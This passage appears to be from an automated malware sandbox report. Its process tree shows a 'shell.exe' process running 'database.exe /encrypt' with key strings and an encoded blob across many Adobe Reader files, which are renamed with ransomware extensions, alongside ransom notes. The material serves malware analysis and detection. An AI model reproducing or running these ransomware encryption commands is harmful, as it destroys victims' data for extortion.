                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6684
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6964
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2936
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6328
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2400
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:7112
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2632
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#Decrypt_Files_ReadMe#.rtf.gif"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:4540
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\PmK9LCHm-9WRFYrHO.[[email protected]].gif"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6772
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6520
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:1652
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:3972
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                    PID:208
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:944
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:6788
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:2280
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                          PID:5104
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                          PID:5516
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                          PID:1896
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:6092
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
